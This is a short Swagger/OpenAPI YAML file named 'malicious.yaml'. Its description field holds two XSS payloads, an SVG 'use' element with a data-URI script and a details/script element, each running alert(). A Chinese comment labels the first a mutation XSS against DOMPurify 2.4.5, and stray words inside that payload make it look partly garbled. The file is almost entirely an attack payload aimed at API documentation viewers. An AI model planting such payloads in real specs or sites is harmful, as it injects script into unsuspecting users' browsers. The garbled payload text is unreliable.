# malicious.yaml
swagger: "2.0"
info:
  description: |
    <!-- 针对 DOMPurify 2.4.5 的 mutation XSS -->
    <svg><use href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg'><script>alert(document.domain)</script></svggraceful degradation#x"></use></svg>
    <!-- 或 -->
    <details open><summary></summary><script>alert(1)</script></details>
paths: {}
